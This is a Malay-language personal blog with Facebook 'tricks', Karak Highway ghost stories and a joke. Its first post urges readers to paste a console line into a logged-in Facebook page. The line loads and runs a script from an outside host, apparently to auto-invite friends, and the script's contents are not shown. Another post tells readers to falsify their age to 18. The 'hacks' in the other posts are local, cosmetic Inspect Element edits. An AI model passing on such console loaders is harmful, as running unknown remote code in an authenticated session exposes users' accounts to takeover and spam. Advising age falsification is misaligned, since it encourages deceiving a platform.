=,= Selamat Datang ke Blog Aewarr! =,= Welcome to Aewarr's Blog! =,=

Monday 3 December 2012

Cara Cepat Invite Rakan ke Group Facebook

Hai? Assalamualaikum. Kali ini saya nak share sikit tentang Auto Invite Friends by Aewarr. Mungkin ramai yang dah tahu tentang trik ini, tapi kepada yang belum tahu anda patut cuba. Cara ini dapat meringankan kerja anda untuk invite semua rakan facebook anda dlm masa yg singkat. Jadi anda takperlu lagi bersusah payah nak invite satu persatu. Sebelum tu join group saya jap, klik sini untuk join!

Oklah kita terus kepada langkah-langkah yang perlu dilakukan. Pertama korang mestilah masuk pada halaman group yang korang buat. 


Kepada pengguna firefox:
Copy code ini
document.body.appendChild(document.createElement('script')).src='http://myname-aewarr.xtgem.com/AutoInvite.js'
  • Tekan Ctrl+Shift+K 
  • Pastekan kod tadi disitu dan Enter. Tunggu beberapa saat akan kelihatan seperti gambar diatas
Kepada pengguna chrome:
Copy code ini
document.body.appendChild(document.createElement('script')).src='http://myname-aewarr.xtgem.com/AutoInvite.js'
  • Tekan F12 
  • Pilih Console
  • Paste kod tadi dan enter. Tunggu beberapa saat akan kelihatan seperti gambar diatas
NOTE: Tidak digalakkan buat pada Chrome kerana ia mungkin tak jadi.

Sunday 11 November 2012

Cara MengHACK Friend Request & Lain-lain

 ASSALAMUALAIKUM
Hai korang, haritu saya ada post tentang Cara MengHack status Facebook! kan? So, kalau ada yang belum baca tu boleh baca sekarang  disini.

Ehemm, tanpa membuang masa lagi saya akan terus ajar Cara MengHACK Friend Request & Lain-lain kepada korang. Tapi ingat korang perlu berhati-hati supaya tidak tersilap steps. Kalau korang buat dengan berhati-hati dan fokus ia akan jadi seperti gambar dibawah


Okay yang pertama korang perlu buat ialah kat tempat friend request , message  & notification tu mestilah ada sekurang-kurangnya 1friend request(kalau nak hack friend request) 1message(kalau nak hack message) & 1notification(kalau nak hack notification)

Tapi contoh kalau korang cuma nak hack friends request yang lain tu takpe takde pun janji kena ada 1friend request. Kalau belum ada friend request tu kena lah tunggu sampai ada baru boleh HACK! ( Sorry post kali tidak ada screen shot )

Kita terus kepada langkah-langkahnya:

  1. Korang letak kan cursor tu kat Friend Request. Lepastu klik kanan ambil Inspect Element
  2. Dah tekan Inspect Element, korang letak pula cursor ditempat yang telah dihightlight kan. Klik kanan ambil Edit as HTML
  3. Lepastu, korang cari perkataan ni requestsCountValue">Bilangan Friends Korang sedia ada</span>
  4. Korang gantikan bilangan friend request korang tu dengan bilangan yang anda ingini, terserahla nak berapa.
  5. Tutup benda tu, dan siap!
NOTE: "Bilangan Friends Request Korang sedia ada" tu adalah bilangan orang add anda. Contoh kalau 2orang telah add anda ia akan jadi macamni requestsCountValue">2</span>

Friday 9 November 2012

Happy Holidays 2012

ASSALAMUALAIKUM

Sebenarnya saya dah lama tak post sesuatu dalam blog ni sebab asyik layan facebook jer keje , HAHA ! btw sape2 yang tak ADD lagi saya tu boleh terus klik disini(automatik terbuka di newtab browser anda). Okay sebenarnya takde ape-ape pun nak dikata cuma ingin mengucapkan Happy Holidays kat korang, Best kan cuti sekolah, kongsi2 la cite korang tu kat saya ok. Setakat ini sahaja posting saya kali ini. Jangan lupa follow saya! Lepastu tinggalkan link blog anda kurang 24jam saya akan follow. Maklumlah sibuk berfacebook je.

Apakah mood anda sekarang ni ye? Kalau saya tengah happy sekarang sebab dapat blogskin baru. acecece >,<

Friday 12 October 2012

Cara MengHack Status Facebook!

 ASSALAMUALAIKUM WBT

Okay topik kita hari ni adalah CaraMengHack Status Facebook! Mungkin anda semua tertanya-tanya kan bagaimana kita nak hack facebook. Tapi post saya ini bukan untuk Hack Facebook ataupun untuk mengambil alih account facebook seseorang. Trik yang saya akan ajar ini hanyalah untuk kesukaan sahaja.

Ok, tanpa buang masa lagi kita mulakan misi hack status fb.
Pertama yang perlu anda lakukan ialah anda harus menggunakan browser Chrome. Bagi yang belum download tu boleh download disini. (Sebenarnya guna Firefox pun boleh cuma saya takingat caranya)

Kedua cari status mangsa(Status yang anda nak hack). Pastu anda highlightkan status itu supaya jadi macamni

Ketiga, anda klik kanan, ambil Inspect element . . Dan ia akan keluar macamni,


Lepas dah keluar macam gambar kat atas tu korang jangan tekan apa-apa lagi. Takut2 kalau korang silap step dia takkan jadi. Ok then, korang fokus kat dalam kotak merah tu dan jangan buat apa2 lagi sehingga diberitahu(info=setiap status dia taksama tulisan yang dalam kotak merah tu jadi anda perlu berhati-hati). Step keempat anda klik kanan kat kotak merah tu ambil edit as HTMI dan akan keluar lebih kurang macam dalam gambar kat bawah tu,

End the last step, anda perhatikan 2 kotak merah tu, padam text/status fb mangsa selepas perkataan <span class="userContent"> dan sebelum perkataan </span></div> selepas itu ganti dengan status anda disitu. Selepas ganti dengan status anda, tekan enter dan close benda tu. Dah siap! Anda sekarang telah berjaya mengHack status fb suka-suka ! HAHA, saya pun dah banyak kali cuba benda ni, takcaye? try tengok gambar kat bawah nih :)


Dan banyak lagi anda boleh hack seperti hack orang yang like status tu, hack friend request subsribers dan banyak lagi, steps nya saya akan ajar lain kali okayy! Mohon maaf jika terkasar bahasa tersilap tulis atau apa2 sahaja salah saya. Manusia kan taklari dari membuat kesalahan. Sebagai umat Islam kita harus saling maaf memaafi antara satu sama lain. Ok, tangan ni pun dah letih nak menaip, nak karang banyak2 taktahu nak tulis apa. Setakat ini sahaja post saya kali ni, Terima kasih membaca. Kalau ada sebarang pertanyaan boleh komen dan saya akan jawab sedaya mungkin. Kalau cara ni berkesan, Like okay!

Nak Hack Friends Request pun boleh!

NOTE: Hanya anda seorang sahaja yang boleh melihat perubahan ini. Selepas anda refresh page itu ia akan menjadi seperti sedia kala.


Monday 17 September 2012

Cara Allow Subscriber di Profil Facebook

Cara Mengaktifkan Tombol Subscribe di Halaman Profile Facebook , Mungkin anda pernah melihat teman anda yang di profil facebook ada tombol Berlangganan/Subscribe? Kenapa Punya saya tidak ada, untuk itu kita perlu mengaktifkanya, cara mengaktifkan Berlangganan/Subscribe adalah Cukup Mengunjungi Link ini *Persyaratan untuk mengaktifkan tombol berlangganan adalah usia Anda harus berusia setidaknya 18 tahun (tiada screenshot untuk post ini) ANDA MESTI TUKAR UMUR ANDA SEKURANGNYA 18 TAHUN UNTUK ALLOW SUBSCRIBER
untuk dapat mengizinkan pelanggan. Jika usia anda sudah 18 tahun muncul tulisan Berlangganan/Subscribe pada gambar diatas, tinggal anda klik dan atur privasi berlangganan sesuai selera anda, mudah bukan? Demikian Tips And Tricks Cara Mengaktifkan Tombol Berlangganan/Subscribe di Halaman Profile Facebook. Jangan lupa untuk subscribe Developer Thank you !

Wednesday 5 September 2012

Misteri Lebuhraya Karak Bahagian II

Kisah-kisah misteri yang berlaku di Highway Karak Peristiwa pertama Kejadian ini terjadi pada suatu senja, sekitar tahun 1995 di satu kawasan di dalam daerah Bentong. Kami sedang dalam perjalanan ke Kuala Lumpur. Di dalam remang-remang senja, suasana kiri kanan jalan sememangnya sepi dan sunyi. Cuma pepohon getah berbalam-balam berdiri kaku sepanjang jalan raya yang kami lalui.....
Terkadang-kadang, kelihatan kilang papan tersergam gah di tepi jalan. Sehingglah kami tiba di satu kawasan. Dari jauh bertentangan arah kami, kelihatan seorang lelaki berjalan kaki seorang diri di atas bahu jalan. Lelaki itu memakai seluar khaki, dan berbaju oren. Saya antara endah tak endah dengan susuk tubuh lelaki itu. Jam ketika itu menunjukkan ke angka 7.30 malam. Sehinggalah kenderaan kami menghampiri nya, saya tersentak, saya terperasan, pelik sungguh, lelaki itu tidak bermuka, mukanya licin seperti pinggan. Kenderaan kami terus meninggalkan lelaki misteri itu, jauh dibelakang.
Saya terdiam sebentar, antara percaya dan tidak. Perlahan-lahan sepupu saya bersuara kepada ibunya, "mak, orang lelaki tu tak de muka ke?" pantas sahaja ibunya menyanggah, "hang ni mulut cabul!!!" Rupa-rupanya bukan saya seorang sahaja yang terlihat. Sehinga kini lelaki itu masih menjadi misteri kepada saya. Namun apalah anehnya lelaki itu, jika dibandingkan dengan alam cakerawala ciptaan yang berputar sendiri pada orbitnya... Subhanallah....
Peristiwa kedua Kalau sebelumnya Rosnah seringkali tergelak kecil tidak percaya apabila mendengar kawan-kawannya bercerita soal misteri. Tetapi apa yang dialaminya malam minggu lalu, benar-benar menyedarkan dirinya bahawa makhluk halus memang wujud di alam ini.
Rosnah masih ingat lagi, malam itu syarikat tempatnya bekerja menganjurkan jamuan makan malam tahunan, di salah sebuah hotel terkemuka di tengah-tengah ibu kota. Sungguhpun majlis tamat sebelum menjelang tengah malam, namun disebabkan hujan turun dengan lebatnya, Rosnah nyaris-nyaris tertinggal bas untuk pulang ke rumah. Bersama-sama Mona yang kebetulan mendiami kawasan perumahan berhampiran, mereka duduk di belakang perut bas kerana tahu-tahu ajelah kalau perkhidmatan bas terakhir, pasti penuh penumpang.
Selepas membayar tambang kepada konduktor bas, mereka berborak-borak kosong. Bas pula laju memecut keheningan jalan raya. Hanya sesekali berhenti menurunkan penumpang apabila loceng dibunyikan. Sedang asyik Rosnah dan Mona bersembang, pemandu bas tiba-tiba menekan brek kecemasan.
Kedengaran pemandu merungut-rungut marah pada sesuatu yang mereka sendiri tidak fahami butir bicaranya. Suasana menjadi hingar-bingar, ada yang meluru ke hadapan untuk melihat apa yang terjadi. Tidak kurang juga yang berpandang sesama sendiri, tertanya-tanya.
“Bertenang, bertenang... jangan kecoh-kecoh. Bukannya kita langgar orang tapi ada masalah teknikal sikit, tak de apa-apa,” kata konduktor bas sambil meminta beberapa pemuda yang berada di belakang tempat duduk pemandu, kembali ke tempat masing-masing.
“Apa hal bang, tayar pancit ke?” Tanya pula seorang gadis India kepada konduktor tadi. Rosnah yang tidak senang duduk mula berdiri, meninjau-ninjau keluar tingkap untuk melihat sekeliling. Tetapi keadaan lampu jalan yang agak malap, membataskan penglihatannya.
Sambil mengangkat bahu dan menggeleng-gelengkan kepala, konduktor tersebut kembali ke hadapan semula. “Eh Mona, kau agak-agak bas ni kenapa ha? Kalau nak kata dia langgar orang, mesti kita dengar jeritan, tapi entahlah, kan...” kata Rosnah cuba turun tetapi ditegah oleh Mona.
“Tak payahlah kita pulak nak turun, kan ke hujan masih renyai-renyai. Biarkan mereka yang menyelesaikan, apa pun masalah yang berlaku. Lagipun tak manis, kita orang perempuan menyibuk tak tentu pasal, malulah...,” ujar Mona berulang-kali.
Belum sempat Rosnah menyampuk kata-kata Mona, bas kembali bergerak tanpa sebarang amaran, sehinggakan dua tiga orang penumpang yang masih berdiri terhuyung-hayang mencari tempat duduk. Dengan nada menjerit, pemandu bas meminta semua penumpang menutup tingkap jika ada yang terbuka, atau tidak bertutup rapat.
“Cepat sikit...,” ujarnya dengan suara sedikit tenggelam-timbul kerana hujan lebat turun secara tiba-tiba. Rosnah mula rasa tidak sedap hati. Kerana tidak mahu menakutkan Mona, dia hanya mendiamkan diri. Dipandangnya wajah gadis India yang duduk berhampiran dengannya tetapi sepantas itu juga, Rosnah memalingkan mukanya ke hadapan.
Kelu lidahnya hendak berkata-kata, hinggakan mahu mencuit tangan Mona pun dia tidak terdaya. Dalam hatinya hanya mampu membaca, beberapa potong ayat suci yang sempat terlintas di hati, itu pun ada yang lintang-pukang. Sambil berdoa agar bas cepat sampai, Rosnah sebenarnya tidak pasti apakah yang perlu dilakukannya sekarang.
Khayalannya terhenti apabila Mona mengoncang-goncangkan bahunya sambil memberi isyarat, mereka sudah hampir sampai ke hentian seterusnya iaitu pondok bas di hadapan taman perumahan mereka. Tetapi peliknya walau berulang kali Mona membunyikan loceng, pemandu tetap meneruskan perjalanan.
“Bang... berhentikanlah bas! Rumah kami dah terlepas ni, tak dengar ke?” Kata Mona dengan nada separuh marah. Tidak mempedulikan permintaan Mona, bas terus dipandu laju sehinggalah tidak lama kemudian, pemandu membelokkan bas masuk ke dalam kawasan balai polis.
Apa lagi, sepantas kilat dia membuka pintu bas dan meluru ke perut balai diikuti beberapa penumpang lain. Rosnah yang sedari tadi seperti dipukau, turut mengambil tindakan serupa dengan menarik sekuat hati tangan Mona agar menurutinya.
Beberapa anggota yang masih bertugas, keluar mendapatkan mereka dan setelah pemandu dan konduktor menceritakan segala-galanya, barulah Mona tahu keadaan sebenar. Itu pun puas Rosnah mengiakan apa yang diperkatakan, sebagai bukti dia turut melihat kejadian tersebut.
Sah! Seperti mana yang Rosnah nampak, memang gadis India itu tidak berkepala dan itulah puncanya pemandu bas melakukan brek kecemasan. Ini kerana dia sendiri tergamam apabila kepala gadis itu, melayang-layang di hadapan cermin hadapan bas. Peliknya apabila diperiksa, gadis India itu tiada di tempatnya, tetapi bas tersebut berbau busuk dan hanyir...
Peristiwa ketiga Beberapa tahun yang lepas, satu keluarga berbangsa melayu dalam perjalanan pulang ke Terengganu untuk menziarah saudara mara di kampung. Mereka semuanya berempat iaitu sepasang suami isteri dan dua anak perempuan mereka. Mungkin ingin mengelakkan jalan yang sibuk, mereka bertolak agak lewat dan sesampainya di Tol Gombak, jam telahpun menunjukkan tepat pukul 12 tengah malam.
“Bang, jangan bawak laju sangat bang, Ayu dengar kat area depan tu banyak accident tau,”“Alah, abang tahu tapi kereta dah bikin cam ni mana boleh slow, kenalah lenjan habis, heh”, balas Hamid.
Sementara mereka berdua sibuk berbual, anak-anak mereka telah pun lena tidur di belakang. Ayu cuba menahan dari tertidur untuk berbual dengan suaminya agar tidak merasa mengantuk jika memandu sendiri. Ketika sedang asyik berbual tiba-tiba kedengaran bunyi rempuhan.“Ah, sudah apa yang kita terlanggar tadi?”“Bang, try check entah-entah kita terlanggar orang melintas ke, susah kita dibuatnya bang” kata Ayu kepada suaminya.
Akur dengan kehendak isterinya, Hamid memberhentikan keretanya di bahu jalan. Hamid keluar dari kereta dan cuba meninjau jalan yang telah dilaluinya tadi tetapi gagal menjumpai apa-apa. Hamid mengambil keputusan untuk meneruskan perjalanannya, tetapi entah mengapa enjin keretanya tidak dapat dihidupkan.“Eh…pelik tadi ok je, orang nak cepat dia buat hal pulak!”bentak Hamid.“Kenapa bang?…rosak ke, trylah tengok-tengokkan enjin tu”, balas Ayu.
Apabila bonet depan dibuka, Hamid dapati keretanya kekurangan air. Hamid menyumpah-nyumpah dirinya kerana kecuaiannya menyebabkan mereka sekeluarga tersangkut di tengah-tengah Lebuhraya Karak. Memikirkan kemungkinan ada anak sungai berhampiran, Hamid mencapai botol dari dalam kereta dan berjalan seorang diri dalam kegelapan malam. Sebelum itu sempat dipesan kepada isterinya agar semua pintu dikunci dan jangan melayan jika ada orang selain darinya yang datang. Sambil berjalan, Hamid menyumpah-nyumpah dalam hati. Kemarahannya reda bila mendapati ada cahaya di depannya, lantas dia menuju ke arah tersebut. Cahaya tersebut adalah bayangan cahaya bulan pada air sungai, tanpa berlengah Hamid memenuhkan air ke dalam botol yang dibawanya. Keadaan di sekeliling sungai sepi, hanya sesekali desiran angin malam membuatkan tubuh Hamid menggeletar kesejukan.
Ketika sedang mengambil air Hamid memandang sekelilingnya, hanya pohon-pohon tua yang berbentuk ganjil,besar,tinggi dan kelihatan menakutkan. Dan ketika itu pandangan Hamid tertumpu pada sebatang pohon tua yang berada di hadapannya. Lamunannya tersentak bila dia mendapati ada sesuatu yang bergerak di balik pokok. Hamid mula mengundurkan diri, memikirkan kemungkinan ianya binatang buas. Tetapi sangkaannya meleset bila perlahan-lahan ada sekujur tubuh di tutup kain putih keluar dari balik pokok.
Tanpa menanti botol penuh Hamid segera mengangkat kaki sambil mulutnya terkumat-kamit membaca Ayat Kursi. Ketika berlari pendengarannya dikejutkan dengan suara perempuan menjerit keras, diikuti dengan raung tangis berpanjangan. Sinar rembulan membantunya melihat dengan jelas akar-akar pokok yang berselirat agar tidak tersungkur. Sesampai di kereta isterinya terkejut melihat suaminya yang ketakutan.Terketar-ketar Hamid cuba menyatakan sesuatu.
Dengan cepat Hamid mengisi air dan terus menghidupkan enjinnya. Ketika hendak meneruskan perjalanannya, sempat dia menjeling pada cermin pandang belakang dan alangkah terkejutnya Hamid bila mendapati tubuh berbalut kain putih tadi berada di belakang keretanya tetapi kali ini Hamid dapat melihat dengan jelas mukanya. Kulitnya kering kontang, berkeriput dan biji matanya tersembul keluar.
Ketika itu juga hidungnya dapat menangkap bau busuk seperti mayat yang terbiar. “Ayu, jangan pandang belakang”, kata Hamid mengingatkan isterinya. Walaupun Hamid menekan habis minyak tetapi dirasakan keretanya bergerak terlalu perlahan dan makhluk yang mengejarnya telahpun berada di sebelah kanannya. Isterinya telah pun pitam bila memandang makhluk tersebut. Kini hanya tinggal Hamid seorang menghadapi makhluk tersebut.
Keesokan harinya terpapar di dada akhbar sekeluarga maut ketika dalam perjalanan pulang ke Terengganu. Keretanya terperosok ke dalam sungai yang letaknya sejauh 1 kilometer dari bahu jalan!! Sehingga kini bagaimana kereta tersebut boleh terbabas sejauh itu masih menjadi misteri yang belum bertemu jawapannya.
Like FanPage rasmi blog ini untuk lebih info klik-->
di sini<--

Kisah Suami Kantoi & Isteri Yang Sengal

Suatu hari...seorang suami baru pulang dari meeting (sbnr nyr dating)...dan melihat isterinya menangis teresak2... Suami : Nape ni yang? Isteri : Sudahla bang..lepaskan saje saya ni!! Suami : Eh..nape awak ckp camtu lak?? Isteri : Saya tahu..awak ade jumpe pompuan laen kan? Suami : Eh...apa awak ckp ni?? (terkejut sbb bini mcm dah tau perkara sebenar) Isteri : Sudahla bang..sume nye da tebukti...ade pompuan yg jwb tepon mase sy call awak...dah byk kali.. Suami : Eerr..aaa...ba..baik la..abg mengaku..abg ade pompuan len..tp..ape yg pompuan tu ckp kt awak? Isteri : Huh..nyampah...mentang2 sy x tau omputeh...tp sy ade hafal ape yg dier ckp.. Suami : Dier ckp ape? Isteri : Dier ckp.."The number u have call..cannot be reached at this momment..please try again"......asal sy tepon je..dier ckp camtu...da x reti ckp mende len agaknyer..pompuan camtu pon awak nak? Suami : .......(dlm hati) alamak...nyesal pula ngaku tadi... Banyak lagi lawak yang boleh anda dapati di sini ( JUST COPY & PASTE )